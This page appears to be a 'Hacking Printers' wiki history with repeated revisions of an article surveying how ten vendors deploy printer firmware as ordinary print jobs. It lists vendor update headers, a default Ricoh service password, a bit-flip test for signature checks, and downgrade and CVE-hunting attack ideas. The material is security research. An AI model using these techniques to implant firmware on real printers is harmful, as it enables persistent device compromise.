Hacking Printers - User contributions [en]

Firmware updates

2017-01-31T09:04:53Z

84.153.135.37: /* Results */

The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.

Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>.

== Vendors ==

To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows.

=== HP ===

Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>.

=== Canon ===

Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.

=== Epson ===

Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms.

=== Dell ===

Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information.

=== Brother ===

Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms.

=== Lexmark ===

Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>.

=== Samsung ===

Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms.

=== Xerox ===

Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself.

=== Ricoh ===

The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>.

=== Kyocera ===

Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms.

=== Konica ===

Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure.

== Results ==

Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:

{| class="wikitable"
|-
! Vendor !! Extension !! Quantity !! File header or type
|-
| rowspan="2" | HP
| rfu || 419 || @PJL UPGRADE SIZE=…
|-
| bdl || 206 || FutureSmart binary format
|-
| rowspan="3" | Epson
| rcx || 49 || SEIKO EPSON EpsonNet Form
|-
| prn || 9 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| brn || 7 || Unknown binary, includes config file
|-
| rowspan="6" | Dell
| fls, fly || 30 || @PJL LPROGRAMRIP
|-
| prn || 25 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 18 || @PJL FIRMWARE=…
|-
| brn || 3 || Unknown binary, includes config file
|-
| ps || 2 || PostScript (title: ''Firmware Update'')
|-
| pjl || 1 || @PJL ENTER LANGUAGE=FLASH
|-
| rowspan="2" | Brother
| djf || 79 || @PJL EXECUTE BRDOWNLOAD
|-
| blf || 9 || @PJL ENTER LANGUAGE=PCL
|-
| rowspan="2" | Lexmark
| fls || 63 || @PJL LPROGRAMRIP
|-
| bin, fls || 6 || Unknown binary format
|-
| rowspan="2" | Samsung
| hd || 33 || @PJL FIRMWARE=…
|-
| fls, hd0 || 4 || @PJL DEFAULT P1284VALUE=…
|-
| rowspan="10" | Xerox
| ps || 36 || PostScript (title: ''Firmware Update'')
|-
| dlm || 35 || Xerox Dynamic Loadable Module
|-
| prn, bin || 20 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 16 || @PJL FIRMWARE=…
|-
| brn || 10 || Unknown binary, includes config file
|-
| bin || 10 || @PJL SET JOBATTR="@SWDL"
|-
| fls, hd, hde || 8 || @PJL DEFAULT P1284VALUE=…
|-
| fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH
|-
| pjl || 3 || @PJL FSDOWNLOAD [name].rpm
|-
| axf || 3 || RISC OS AIF executable
|-
| rowspan="3" | Ricoh
| brn || 15 || @PJL FWDOWNLOAD…
|-
| bin || 14 || @PJL RSYSTEMUPDATE SIZE=…
|-
| fls || 4 || @PJL LPROGRAMRIP
|-
| rowspan="4" | Kyocera
| cramfs, img || 98 || cramfs image
|-
| bin, squashfs || 79 || squashfs image
|-
| bin, kmmfp || 41 || u-boot legacy uImage
|-
| efi, kmpanel || 13 || proprietary image format
|-
| rowspan="4" | Konica Minolta
| bin || 38 || unknown binary, additional checksum file
|-
| ps || 20 || PostScript (title: ''Softload printer modules'')
|-
| ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE
|-
| upg || 1 || @PJL ENTER LANGUAGE=UPGRADE
|-
|}

'''How to test for this attack?'''

The security of code signing is based on keeping the private key a long-term trade secret. There are however still printers in the wild which are potentially vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfied by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.

''Other attack scenarios include:''

* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version which has known security weaknesses.
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable).
* Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

Firmware updates

2017-01-31T08:58:10Z

84.153.135.37: /* Brother */

The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.

Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>.

== Vendors ==

To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows.

=== HP ===

Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>.

=== Canon ===

Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.

=== Epson ===

Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms.

=== Dell ===

Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information.

=== Brother ===

Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms.

=== Lexmark ===

Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>.

=== Samsung ===

Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms.

=== Xerox ===

Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself.

=== Ricoh ===

The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>.

=== Kyocera ===

Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms.

=== Konica ===

Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure.

== Results ==

Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:

{| class="wikitable"
|-
! Vendor !! Extension !! Quantity !! File header or type
|-
| rowspan="2" | HP
| rfu || 419 || @PJL UPGRADE SIZE=…
|-
| bdl || 206 || FutureSmart binary format
|-
| rowspan="3" | Epson
| rcx || 49 || SEIKO EPSON EpsonNet Form
|-
| prn || 9 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| brn || 7 || Unknown binary, includes config file
|-
| rowspan="6" | Dell
| fls, fly || 30 || @PJL LPROGRAMRIP
|-
| prn || 25 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 18 || @PJL FIRMWARE=…
|-
| brn || 3 || Unknown binary, includes config file
|-
| ps || 2 || PostScript (title: ''Firmware Update'')
|-
| pjl || 1 || @PJL ENTER LANGUAGE=FLASH
|-
| rowspan="2" | Brother
| djf || 79 || @PJL EXECUTE BRDOWNLOAD
|-
| blf || 9 || @PJL ENTER LANGUAGE=PCL
|-
| rowspan="2" | Lexmark
| fls || 63 || @PJL LPROGRAMRIP
|-
| bin, fls || 6 || Unknown binary format
|-
| rowspan="2" | Samsung
| hd || 33 || @PJL FIRMWARE=…
|-
| fls, hd0 || 4 || @PJL DEFAULT P1284VALUE=…
|-
| rowspan="10" | Xerox
| ps || 36 || PostScript (title: ''Firmware Update'')
|-
| dlm || 35 || Xerox Dynamic Loadable Module
|-
| prn, bin || 20 || @PJL ENTER LANGUAGE=DOWNLOAD
|-
| hd || 16 || @PJL FIRMWARE=…
|-
| brn || 10 || Unknown binary, includes config file
|-
| bin || 10 || @PJL SET JOBATTR="@SWDL"
|-
| fls, hd, hde || 8 || @PJL DEFAULT P1284VALUE=…
|-
| fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH
|-
| pjl || 3 || @PJL FSDOWNLOAD [name].rpm
|-
| axf || 3 || RISC OS AIF executable
|-
| rowspan="3" | Ricoh
| brn || 15 || @PJL FWDOWNLOAD…
|-
| bin || 14 || @PJL RSYSTEMUPDATE SIZE=…
|-
| fls || 4 || @PJL LPROGRAMRIP
|-
| rowspan="4" | Kyocera
| cramfs, img || 98 || cramfs image
|-
| bin, squashfs || 79 || squashfs image
|-
| bin, kmmfp || 41 || u-boot legacy uImage
|-
| efi, kmpanel || 13 || proprietary image format
|-
| rowspan="4" | Konica Minolta
| bin || 38 || unknown binary, additional checksum file
|-
| ps || 20 || PostScript (title: ''Softload printer modules'')
|-
| ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE
|-
| upg || 1 || @PJL ENTER LANGUAGE=UPGRADE
|-
|}

'''How to test for this attack?'''

The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.

''Other attack scenarios include:''

* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses.
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable).
* Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

Firmware updates

2017-01-31T08:56:33Z

84.153.135.37: /* Canon */

The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.

Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>.

== Vendors ==

To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows.

=== HP ===

Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>.

=== Canon ===

Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.

=== Epson ===

